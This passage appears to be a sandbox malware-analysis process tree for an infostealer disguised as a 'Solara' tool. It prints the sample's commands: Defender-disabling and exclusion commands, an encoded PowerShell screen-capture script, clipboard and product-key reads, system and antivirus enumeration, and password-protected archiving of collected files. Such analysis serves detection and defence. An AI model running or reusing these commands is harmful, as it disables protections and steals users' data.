dQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    PID:5448
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:1920
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lwf1sixu\lwf1sixu.cmdline"
        5⤵
        
        PID:4768
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE706.tmp" "c:\Users\Admin\AppData\Local\Temp\lwf1sixu\CSC4717BC7BD2B14270878367F6F7455D66.TMP"
        6⤵
        
        PID:604
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4844
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5496
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1004
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4944
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2284
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3020
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1300
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5328
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2772
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5192
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 348"
    3⤵
    PID:2812
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 348
      4⤵
      Kills process with taskkill
      PID:5220
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5888"
    3⤵
    PID:3860
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 5888
      4⤵
      Kills process with taskkill
      PID:5408
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:4564
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:6076
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI53322\rar.exe a -r -hp"blank" "C:\Users\Admin\AppData\Local\Temp\IbBJI.zip" *"
    3⤵
    PID:4912
  - - C:\Users\Admin\AppData\Local\Temp\_MEI53322\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI53322\rar.exe a -r -hp"blank" "C:\Users\Admin\AppData\Local\Temp\IbBJI.zip" *
      4⤵
      Executes dropped EXE
      PID:1112
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:1020
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      PID:3824
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:4716
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:4932
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:4392
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:472
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:584
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:5880
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:3792
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:5796
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:5872
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2952

C:\Users\Admin\Desktop\255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe
"C:\Users\Admin\Desktop\255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe"
1⤵
- Executes dropped EXE
PID:3432
- C:\Users\Admin\Desktop\255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe
  "C:\Users\Admin\Desktop\255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:1588
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe'"
    3⤵
    PID:5300
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:2256
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    PID:5908
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:1968
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Solara has been repaired.', 0, 'Solara | Repaired', 48+16);close()""
    3⤵
    PID:3204
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Solara has been repaired.', 0, 'Solara | Repaired', 48+16);close()"
      4⤵
      PID:5592
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
    3⤵
    PID:6008
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:1388
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:2476
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4732
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:1036
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4784
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    PID:4596
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:3152
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:4680
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:5760
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:5160
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:1444
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:5752
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2828
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:5268
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:4480
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    PID:4796
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA